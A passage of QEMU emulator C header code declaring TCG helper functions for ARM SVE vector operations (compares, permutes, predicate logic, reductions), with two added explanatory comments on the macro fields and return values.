DEF_HELPER_FLAGS_4(sve_adr_u32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fexpa_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fexpa_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fexpa_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ftssel_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ftssel_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ftssel_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) 
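/*
 * Reader's note (added annotation, not upstream QEMU text): in these
 * declarations, DEF_HELPER_FLAGS_<N> declares a TCG helper taking N
 * arguments; the fields are the helper name, the TCG call flags, the
 * return type, and then the N argument types. TCG_CALL_NO_RWG asserts
 * that the helper neither reads nor writes TCG globals, which lets the
 * code generator keep guest registers cached in host registers across
 * the call. The _b/_h/_s/_d suffixes give the element size (byte,
 * halfword, word, doubleword); in the operation names, z denotes a
 * vector register operand, p a governing predicate, i an immediate and
 * w a wide 64-bit operand. As a rough sketch (the argument names here
 * are illustrative), a declaration such as
 *     DEF_HELPER_FLAGS_5(sve_asr_zpzw_s, TCG_CALL_NO_RWG,
 *                        void, ptr, ptr, ptr, ptr, i32)
 * expands to a prototype of the form
 *     void helper_sve_asr_zpzw_s(void *vd, void *vn, void *vm,
 *                                void *vg, uint32_t desc);
 * where the trailing i32 is the packed simd descriptor built by
 * simd_desc().
 */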
DEF_HELPER_FLAGS_4(sve_sqaddi_b, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_sqaddi_h, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_sqaddi_s, TCG_CALL_NO_RWG, void, ptr, ptr, s64, i32) DEF_HELPER_FLAGS_4(sve_sqaddi_d, TCG_CALL_NO_RWG, void, ptr, ptr, s64, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_b, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_h, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_s, TCG_CALL_NO_RWG, void, ptr, ptr, s64, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_uqsubi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_ext, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_insr_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_insr_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_insr_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_insr_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_3(sve_rev_b, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sunpk_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sunpk_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sunpk_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uunpk_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uunpk_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uunpk_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_p, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_p, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_p, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_p, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_punpk_p, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_d, 
TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_compact_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_compact_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_2(sve_last_active_element, TCG_CALL_NO_RWG, s32, ptr, i32) DEF_HELPER_FLAGS_4(sve_revb_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revb_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revb_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revh_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revh_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revw_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_splice, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, 
ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmple_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplt_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplo_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpls_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmple_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplt_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplo_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpls_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmple_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplt_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplo_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpls_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmple_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) 
DEF_HELPER_FLAGS_4(sve_cmple_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmple_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmple_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orn_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_nor_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_nand_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpa, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpb, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpas, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpbs, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brka_z, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkb_z, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brka_m, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkb_m, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkas_z, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkbs_z, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkas_m, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkbs_m, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) 
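/*
 * Reader's note (added annotation): the compare helpers above
 * (sve_cmp*_ppzz, _ppzw, _ppzi) and the flag-setting break helpers
 * (sve_brkpas/sve_brkpbs, sve_brkas_*/sve_brkbs_*) return i32 rather
 * than void. The returned value is the NZCV flag word computed
 * alongside the predicate result, so the translator can update the
 * condition flags without a separate PTEST-style pass over the
 * destination predicate.
 */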
DEF_HELPER_FLAGS_4(sve_brkn, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkns, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_cntp, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_while, TCG_CALL_NO_RWG, i32, ptr, i32, i32) DEF_HELPER_FLAGS_4(sve_subri_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_subri_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_subri_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_subri_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(gvec_recps_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_recps_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_recps_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_rsqrts_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_rsqrts_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_rsqrts_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_faddv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_faddv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_faddv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxnmv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxnmv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxnmv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminnmv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminnmv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminnmv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) 